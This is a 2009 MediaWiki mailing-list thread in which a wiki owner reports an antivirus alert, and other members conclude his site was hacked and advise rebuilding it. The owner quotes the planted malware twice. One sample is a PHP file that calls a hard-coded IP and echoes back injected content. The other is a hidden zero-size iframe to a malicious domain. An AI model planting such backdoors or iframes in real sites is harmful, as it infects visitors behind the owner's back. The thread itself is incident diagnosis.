I got an email from someone accessing my wiki:
http://against-the-day.pynchonwiki.com/wiki/index.php?title=Main_Page
I'm using v 1.9.3
Here's the message I received:
I get a message from Avast anti-virus that the page is infected with : HTML:Iframe-inf. I have contacted Avast who says this is not a false positive. You can Google virus name--it seems that this infection is fairly common. Please let me know if the infection is real--I would like to use the wiki.
Any idea of what I should do to address this?
Thanks! Tim
.........................................................Tim Ware......................................................... HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607 t: (510) 339-6084 .. f: (510) 339-6086 .. e: tim@hyperarts.com .. twitter.com/hyperarts http://www.hyperarts.com Map
You seem to also have external content running on there such as m-analytics and addthis, try removing them and asking them to check again. If it still happens then you can confirm a MediaWiki problem, but I suspect it may be the analytics or similar triggering this as its the only content loading in an iframe and this is what the error seems to suggest.
Regards
Mark
On Mon, Jun 22, 2009 at 7:59 PM, Tim Ware tim@hyperarts.com wrote:
I got an email from someone accessing my wiki:
http://against-the-day.pynchonwiki.com/wiki/index.php?title=Main_Page
I'm using v 1.9.3
Here's the message I received:
I get a message from Avast anti-virus that the page is infected with : HTML:Iframe-inf. I have contacted Avast who says this is not a false positive. You can Google virus name--it seems that this infection is fairly common. Please let me know if the infection is real--I would like to use the wiki.
Any idea of what I should do to address this?
Thanks! Tim
.........................................................Tim Ware......................................................... HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607 t: (510) 339-6084 .. f: (510) 339-6086 .. e: tim@hyperarts.com .. twitter.com/hyperarts http://www.hyperarts.com Map
MediaWiki-l mailing list MediaWiki-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
I notice several files that seem to have modified at the docroot level:
foter.php (never noticed this one before) with this content:
<?php $ip = '209.62.27.83'; $port = '80'; $path = '/linkr/get/'; $fp = fsockopen($ip, $port, $errno, $errstr, 30); if (!$fp) { echo ''; } else { $post = "u = ".rawurlencode ($ _SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']); $out = "POST ".$path." HTTP/1.0\r\n"; $out .= "Host: ".$ip.":".$port."\r\n"; $out .= "Content-Type: text/html\r\n"; $out .= "Content-Length: ".strlen($post)."\r\n"; $out .= "Connection: Close\r\n"; $out .= "\r\n"; $out .= $post; fwrite($fp, $out); $resp = ''; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); $paths = split("\r\n\r\n", $resp); echo $paths[1]; } ?>
and this "m-analytics" code was added to an old index page and a google verification page:
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a " width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Same thing happened to another wiki on this site, where the m- analytics iframe was added. I *did not* add this, so I suspect foul play.
Thoughts?
Tim
.........................................................Tim Ware......................................................... HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607 t: (510) 339-6084 .. f: (510) 339-6086 .. e: tim@hyperarts.com .. twitter.com/hyperarts http://www.hyperarts.com Map
On Jun 22, 2009, at 12:05 PM, Mark (Markie) wrote:
You seem to also have external content running on there such as m- analytics and addthis, try removing them and asking them to check again. If it still happens then you can confirm a MediaWiki problem, but I suspect it may be the analytics or similar triggering this as its the only content loading in an iframe and this is what the error seems to suggest.
Regards
Mark
On Mon, Jun 22, 2009 at 7:59 PM, Tim Ware tim@hyperarts.com wrote:
I got an email from someone accessing my wiki:
http://against-the-day.pynchonwiki.com/wiki/index.php?title=Main_Page
I'm using v 1.9.3
Here's the message I received:
I get a message from Avast anti-virus that the page is infected with : HTML:Iframe-inf. I have contacted Avast who says this is not a false positive. You can Google virus name--it seems that this infection is fairly common. Please let me know if the infection is real--I would like to use the wiki.
Any idea of what I should do to address this?
Thanks! Tim
.........................................................Tim Ware......................................................... HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607 t: (510) 339-6084 .. f: (510) 339-6086 .. e: tim@hyperarts.com .. twitter.com/hyperarts http://www.hyperarts.com Map
MediaWiki-l mailing list MediaWiki-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
MediaWiki-l mailing list MediaWiki-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
Tim Ware schrieb:
Same thing happened to another wiki on this site, where the m- analytics iframe was added. I *did not* add this, so I suspect foul play.
Thoughts?
If php files on your web space are changed without your knowledge and permission, than yopu have been hacked. Once someone has the ability to change your files, there is nothing mediawiki can do about it.
I suggest to make a backup of your database, plus an XML dump for good measure, scrap everything and start with a fresh install. MediaWiki 1.9.3 is not only old btw, but also missing serveral security updates... Current version is 1.15 (!), current patch level of 1.9 is 1.9.6, but it's no longer supported and doesn't receive patches any more.
Good luck Daniel
Tim Ware wrote:
I notice several files that seem to have modified at the docroot level:
foter.php (never noticed this one before) with this content:
<?php $ip = '209.62.27.83'; $port = '80'; $path = '/linkr/get/'; $fp = fsockopen($ip, $port, $errno, $errstr, 30); if (!$fp) { echo ''; } else { $post = "u = ".rawurlencode ($ _SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']); $out = "POST ".$path." HTTP/1.0\r\n"; $out .= "Host: ".$ip.":".$port."\r\n"; $out .= "Content-Type: text/html\r\n"; $out .= "Content-Length: ".strlen($post)."\r\n"; $out .= "Connection: Close\r\n"; $out .= "\r\n"; $out .= $post; fwrite($fp, $out); $resp = ''; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); $paths = split("\r\n\r\n", $resp); echo $paths[1]; } ?>
and this "m-analytics" code was added to an old index page and a google verification page:
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a " width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Same thing happened to another wiki on this site, where the m- analytics iframe was added. I *did not* add this, so I suspect foul play.
Thoughts?
Tim
Backup everything and start from scratch. The only files from the wiki you should need to keep are the uploads. Remember to verify there aren't scripts there.
mediawiki-l@lists.wikimedia.org